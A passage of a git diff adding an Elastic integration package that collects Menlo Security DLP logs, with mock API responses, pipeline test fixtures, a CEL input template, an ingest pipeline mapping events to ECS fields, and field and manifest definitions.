}, + "events": [ + { + "event": { + "dst_url": "http://tinyupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinyupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:16:22.227000", + "event_id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "credit_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinyupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + } + }, + { + "event": { + "dst_url": "http://tinyyupload.com/", + "user_input": "false", + "protocol": "http", + "file_type": "CSV", + "domain": "tinyyupload.com", + "alerted": "false", + "ccl_ids": "CreditordebitcardnumbersGlobal", + "severity": "5", + "event_time": "2020-03-09T17:16:22.227000", + "event_id": "a4c2161b3f81a287e146d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "filename": "creditt_cards.csv", + "version": "2.0", + "sha256": "fd1aee671d92ab35f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a", + "status": "dirty", + "product": "MSIP", + "ccl_match_counts": "1", + "vendor": "Menlo Security", + "ccl_scores": "1", + "rule_name": "Credit card block rule", + "request_type": "GET", + "src_url": "http://tinyyupload.com/", + "categories": "Download Sites", + "stream_name": "/safefile-input/working_file", + "name": "file_upload", + "userid": "admin@menlosecurity.com", + "action": "block", + "rule_id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099" + } + } + ] + } + } + ] + - path: /api/rep/v1/fetch/client_select + methods: [POST] + request_body: '{"log_type":"web","pagingIdentifiers":{},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:12:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec980410c6": 0 + } + }, + "events": [ + { + "event": { + "top_url": "http://elastic.co/", + "egress_country": "US", + "domain": "elastic.co", + "protocol": "http", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.1", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.102000", + "dst": "192.18.1.1", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "http://elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "ua_type": "supported_browser", + "content-type": "text/html; charset=UTF-8", + "response_code": "308" + } + }, + { + "event": { + "top_url": "https://elastic.co/", + "egress_country": "US", + "domain": "elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.1", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.132000", + "full_session_id": "nLxXe_iU-1", + "dst": "192.18.1.1", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "http://elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "severity": "5", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "response_code": "301" + } + } + ] + } + } + ] + - path: /api/rep/v1/fetch/client_select + methods: [POST] + request_body: '{"log_type":"web","pagingIdentifiers":{"hashes":{"2d2a6dcedb5dbc122c36e4ec980410c6":0},"next_time":"2023-11-21T13:12:44.384Z"},"token":"xxxx"}' + query_params: + limit: 2 + format: "json" + start: "{start:.*}" + end: "{end:.*}" + responses: + - status_code: 200 + body: | + [ + { + "timestamp": "2023-11-21T13:12:37.102Z", + "result": { + "pagingIdentifiers": { + "next_time": "2023-11-21T13:13:44.384Z", + "hashes": { + "2d2a6dcedb5dbc122c36e4ec981410c6": 0 + }, + "last_iteration": true + }, + "events": [ + { + "event": { + "top_url": "https://www.elastic.co/", + "egress_country": "US", + "domain": "www.elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.4", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:37.207000", + "full_session_id": "nLxXe_iU-1", + "dst": "192.18.1.4", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "http://elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "severity": "5", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://www.elastic.co/", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "content-type": "text/html; charset=utf-8", + "response_code": "200" + } + }, + { + "event": { + "top_url": "https://www.elastic.co/blog", + "egress_country": "US", + "domain": "www.elastic.co", + "protocol": "https", + "risk_tally": "-1", + "is_iframe": "false", + "origin_ip": "192.18.1.4", + "has_password": "false", + "file_size": "NA", + "browser_and_version": "Chrome_119", + "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "egress_ip": "192.18.1.2", + "sandboxActivity": "NA", + "event_time": "2023-11-21T13:12:44.384000", + "full_session_id": "nLxXe_iU-13", + "dst": "146.75.38.217", + "filename": "NA", + "risk_score": "low", + "version": "2.0", + "pe_rulename": "Business and Economy Category", + "soph_dlp_ref": "NA", + "numSubfiles": "0", + "xff_ip": "NA", + "product": "MSIP", + "origin_country": "US", + "vendor": "Menlo Security", + "rendering_mode": "ACR1", + "inconsistent_domain": "false", + "x-client-country": "US", + "sandboxResult": "NA", + "request_type": "GET", + "referer": "https://www.elastic.co/", + "fullScanResult": "NA", + "tab_id": "1", + "pe_reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "categories": "Business and Economy", + "severity": "5", + "x-client-ip": "192.18.1.3", + "name": "page_request", + "url": "https://www.elastic.co/blog", + "region": "us-east-1c", + "userid": "example_user", + "magicName": "NA", + "pe_action": "isolate", + "ua_type": "supported_browser", + "content-type": "text/html; charset=utf-8", + "response_code": "200" + } + } + ] + } + } + ] diff --git a/packages/menlo/_dev/deploy/docker/docker-compose.yml b/packages/menlo/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..eb800ded4c3 --- /dev/null +++ b/packages/menlo/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,15 @@ +version: '3.0' +services: + menlo: + image: docker.elastic.co/observability/stream:v0.10.0 + hostname: menlosecurity + ports: + - 8080 + volumes: + - ./config.yml:/config.yml + environment: + PORT: '8080' + command: + - http-server + - --addr=:8080 + - --config=/config.yml diff --git a/packages/menlo/changelog.yml b/packages/menlo/changelog.yml new file mode 100644 index 00000000000..999a197f0ea --- /dev/null +++ b/packages/menlo/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial draft of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9315 diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log new file mode 100644 index 00000000000..01eff5b7b65 --- /dev/null +++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log @@ -0,0 +1 @@ +{"event":{"dst_url":"http://tinyupload.com/","user_input":"false","protocol":"http","file_type":"CSV","domain":"tinyupload.com","alerted":"false","ccl_ids":"CreditordebitcardnumbersGlobal","severity":"5","event_time":"2020-03-09T17:16:22.227000","event_id":"a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce","filename":"credit_cards.csv","version":"2.0","sha256":"fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a","status":"dirty","product":"MSIP","ccl_match_counts":"1","vendor":"Menlo Security","ccl_scores":"1","rule_name":"Credit card block rule","request_type":"GET","src_url":"http://tinyupload.com/","categories":"Download Sites","stream_name":"/safefile-input/working_file","name":"file_upload","userid":"admin@menlosecurity.com","action":"block","rule_id":"1f3ef32c-ec62-42fb-8cad-e1fee3375099"}} \ No newline at end of file diff --git a/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json new file mode 100644 index 00000000000..ce6dc0d3007 --- /dev/null +++ b/packages/menlo/data_stream/dlp/_dev/test/pipeline/test-dlp.log-expected.json @@ -0,0 +1,78 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "block", + "category": [ + "intrusion_detection", + "network" + ], + "created": "2020-03-09T17:16:22.227Z", + "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "kind": "alert", + "original": "{\"event\":{\"dst_url\":\"http://tinyupload.com/\",\"user_input\":\"false\",\"protocol\":\"http\",\"file_type\":\"CSV\",\"domain\":\"tinyupload.com\",\"alerted\":\"false\",\"ccl_ids\":\"CreditordebitcardnumbersGlobal\",\"severity\":\"5\",\"event_time\":\"2020-03-09T17:16:22.227000\",\"event_id\":\"a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce\",\"filename\":\"credit_cards.csv\",\"version\":\"2.0\",\"sha256\":\"fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a\",\"status\":\"dirty\",\"product\":\"MSIP\",\"ccl_match_counts\":\"1\",\"vendor\":\"Menlo Security\",\"ccl_scores\":\"1\",\"rule_name\":\"Credit card block rule\",\"request_type\":\"GET\",\"src_url\":\"http://tinyupload.com/\",\"categories\":\"Download Sites\",\"stream_name\":\"/safefile-input/working_file\",\"name\":\"file_upload\",\"userid\":\"admin@menlosecurity.com\",\"action\":\"block\",\"rule_id\":\"1f3ef32c-ec62-42fb-8cad-e1fee3375099\"}}", + "outcome": "success", + "severity": 5 + }, + "file": { + "hash": { + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + }, + "name": "credit_cards.csv" + }, + "http": { + "request": { + "method": "GET" + } + }, + "menlo": { + "dlp": { + "alerted": "false", + "category": "Download Sites", + "ccl": { + "id": "CreditordebitcardnumbersGlobal", + "match_counts": 1, + "score": 1 + }, + "status": "dirty", + "stream_name": "/safefile-input/working_file", + "user_input": "false" + } + }, + "observer": { + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "hash": [ + "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + ], + "user": [ + "admin@menlosecurity.com" + ] + }, + "rule": { + "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099", + "name": "Credit card block rule" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "tinyupload.com", + "original": "http://tinyupload.com/", + "path": "/", + "registered_domain": "tinyupload.com", + "scheme": "http", + "top_level_domain": "com" + }, + "user": { + "name": "admin@menlosecurity.com" + } + } + ] +} \ No newline at end of file diff --git a/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml b/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..cf8c52ab8b8 --- /dev/null +++ b/packages/menlo/data_stream/dlp/_dev/test/system/test-default-config.yml @@ -0,0 +1,11 @@ +input: cel +service: menlo +vars: + url: http://{{Hostname}}:{{Port}}/api/rep/v1/fetch/client_select + token: xxxx +data_stream: + vars: + batch_size: 2 + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs b/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs new file mode 100644 index 00000000000..676c4882736 --- /dev/null +++ b/packages/menlo/data_stream/dlp/agent/stream/input.yml.hbs @@ -0,0 +1,80 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +redact: + fields: + - token +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + batch_size: {{batch_size}} + initial_interval: {{initial_interval}} + token: {{token}} +program: | + post_request( + state.url + "?format=json" + "&limit=" + string(state.batch_size) + "&end=" + string(int(now())) + "&start=" + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(int(state.cursor.last_timestamp.parse_time(time_layout.RFC3339))) + : + (string(int(now() - duration(state.initial_interval)))) + ), + "application/json", + {"token": state.token, "log_type": "dlp", "pagingIdentifiers": ( + has(state.cursor) && has(state.cursor.paging) && state.cursor.paging != null ? + state.cursor.paging + : + {} + ) + }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body[0].result.events.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "batch_size": state.batch_size, + "token": state.token, + "cursor": { + "last_timestamp": ( + has(body[0].timestamp) && body[0].timestamp.size() > 0 + ? + body[0].timestamp.parse_time(time_layout.RFC3339) + : + null + ), + "paging": ( + has(body[0].result.pagingIdentifiers) && body[0].result.pagingIdentifiers.size() > 0 ? + body[0].result.pagingIdentifiers + : + null + ) + } + }) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml b/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..8329bd0d570 --- /dev/null +++ b/packages/menlo/data_stream/dlp/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,200 @@ +--- +description: Mapping of Menlo DLP Fields from API into ECS fields. +processors: + - set: + field: ecs.version + value: 8.11.0 + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - set: + field: event.kind + value: alert + - json: + field: event.original + tag: 'json_decoding' + target_field: json + - rename: + field: json.event.event_id + target_field: event.id + ignore_missing: true + - date: + field: "json.event.event_time" + formats: + - "ISO8601" + target_field: "event.created" + timezone: "UTC" + tag: date_event_created_time_epoch + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uri_parts: + field: json.event.dst_url + target_field: "url" + keep_original: true + remove_if_successful: true + if: ctx.json?.event?.dst_url != null + - registered_domain: + field: url.domain + target_field: url + - rename: + field: json.event.rule_id + target_field: rule.id + ignore_missing: true + - rename: + field: json.event.action + target_field: event.action + ignore_missing: true + - set: + field: event.action + value: blocked + if: ctx.json.event.action == 'block' + - set: + field: event.action + value: log + if: ctx.json.event.action == 'log' + - set: + field: event.type + value: denied + if: ctx.event.action == 'blocked' + - rename: + field: json.event.rule_name + target_field: rule.name + ignore_missing: true + - set: + field: event.category + value: intrusion_detection + - append: + field: event.category + value: network + - convert: + field: "json.event.severity" + type: long + target_field: "event.severity" + ignore_missing: true + - set: + field: event.outcome + value: unknown + - set: + field: event.outcome + value: success + if: ctx.event.action == 'log' || ctx.event.action == 'block' + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.vendor + target_field: observer.vendor + ignore_missing: true + - rename: + field: json.event.version + target_field: observer.version + ignore_missing: true + - rename: + field: json.event.request_type + target_field: http.request.method + ignore_missing: true + - rename: + field: menlo.protocol + target_field: network.protocol + ignore_missing: true + - append: + field: related.user + value: '{{json.event.userid}}' + allow_duplicates: false + if: ctx.json?.event?.userid != null + - rename: + field: json.event.userid + target_field: user.name + ignore_missing: true + - rename: + field: json.event.filename + target_field: file.name + ignore_missing: true + - rename: + field: json.event.sha256 + target_field: file.hash.sha256 + if: ctx.json?.sha256 != "NA" + ignore_missing: true + - append: + field: related.hash + value: "{{{file.hash.sha256}}}" + allow_duplicates: false + if: ctx.file?.hash.sha256 != null + - rename: + field: json.event.categories + target_field: menlo.dlp.category + ignore_missing: true + - convert: + ignore_failure: true + field: json.event.ccl_match_counts + type: long + target_field: menlo.dlp.ccl.match_counts + ignore_missing: true + - rename: + field: json.event.user_input + target_field: menlo.dlp.user_input + ignore_missing: true + - rename: + field: json.event.alerted + target_field: menlo.dlp.alerted + ignore_missing: true + - rename: + field: json.event.status + target_field: menlo.dlp.status + ignore_missing: true + - convert: + field: json.event.ccl_scores + type: long + target_field: menlo.dlp.ccl.score + ignore_missing: true + - rename: + field: json.event.ccl_ids + target_field: menlo.dlp.ccl.id + - rename: + field: json.event.stream_name + target_field: menlo.dlp.stream_name + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/menlo/data_stream/dlp/fields/agent.yml b/packages/menlo/data_stream/dlp/fields/agent.yml new file mode 100644 index 00000000000..98d2f9f38d5 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/agent.yml @@ -0,0 +1,177 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`.' + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/menlo/data_stream/dlp/fields/base-fields.yml b/packages/menlo/data_stream/dlp/fields/base-fields.yml new file mode 100644 index 00000000000..04bbdc68018 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: menlo +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: menlo.dlp +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/menlo/data_stream/dlp/fields/ecs.yml b/packages/menlo/data_stream/dlp/fields/ecs.yml new file mode 100644 index 00000000000..bc427b45597 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/ecs.yml @@ -0,0 +1,54 @@ +- external: ecs + name: ecs.version +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.kind +- external: ecs + name: event.action +- external: ecs + name: event.id +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: http.request.method +- external: ecs + name: observer.product +- external: ecs + name: observer.vendor +- external: ecs + name: observer.version +- external: ecs + name: related.user +- external: ecs + name: related.hash +- external: ecs + name: rule.id +- external: ecs + name: rule.name +- external: ecs + name: tags +- external: ecs + name: url.domain +- external: ecs + name: url.original +- external: ecs + name: url.path +- external: ecs + name: url.registered_domain +- external: ecs + name: url.scheme +- external: ecs + name: url.top_level_domain +- external: ecs + name: user.name diff --git a/packages/menlo/data_stream/dlp/fields/fields.yml b/packages/menlo/data_stream/dlp/fields/fields.yml new file mode 100644 index 00000000000..e56c4dfc448 --- /dev/null +++ b/packages/menlo/data_stream/dlp/fields/fields.yml @@ -0,0 +1,30 @@ +- name: menlo + type: group + fields: + - name: dlp + type: group + fields: + - name: category + type: keyword + description: "Category Rules Category type classification" + - name: ccl.match_counts + type: long + description: "Number of matches of the string that caused the violation" + - name: user_input + type: boolean + description: "Whether or not this event was generated as a result of user form input" + - name: alerted + type: boolean + description: "Whether or not an email alert was sent to a DLP Auditor profile" + - name: status + type: keyword + description: "Result from the DLP engine" + - name: ccl.score + type: long + description: "DLP score from the dictionary that caused the violation" + - name: ccl.id + type: keyword + description: "Name of DLP dictionary that was violated" + - name: stream_name + type: keyword + description: "Internal name used for the file (usually working_file) or text stream (uid)" diff --git a/packages/menlo/data_stream/dlp/manifest.yml b/packages/menlo/data_stream/dlp/manifest.yml new file mode 100644 index 00000000000..479b62f4d73 --- /dev/null +++ b/packages/menlo/data_stream/dlp/manifest.yml @@ -0,0 +1,78 @@ +title: Collect Menlo DLP from Menlo Security API +type: logs +streams: + - input: cel + title: Menlo DLP Logs + description: Collect Menlo DLP logs + template_path: input.yml.hbs + vars: + - name: batch_size + type: text + title: Batch Size + description: Batch size for the response of the Menlo Security API. + default: 1000 + required: true + - name: initial_interval + type: text + title: Initial Interval + description: "How far back to pull the events from Menlo Security API. NOTE: Supported units for this parameter are h/m/s." + multi: false + required: true + show_user: true + default: 24h + - name: interval + type: text + title: Interval + description: "Duration between requests to the Menlo Security API. NOTE: Supported units for this parameter are h/m/s." + default: 1m + multi: false + required: true + show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - menlo + - forwarded + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve menlo.dlp fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false diff --git a/packages/menlo/data_stream/dlp/sample_event.json b/packages/menlo/data_stream/dlp/sample_event.json new file mode 100644 index 00000000000..e39fa7e3a8c --- /dev/null +++ b/packages/menlo/data_stream/dlp/sample_event.json @@ -0,0 +1,98 @@ +{ + "@timestamp": "2024-03-28T13:30:21.204Z", + "agent": { + "ephemeral_id": "1054908a-63b4-46fd-8028-f975d0f878c2", + "id": 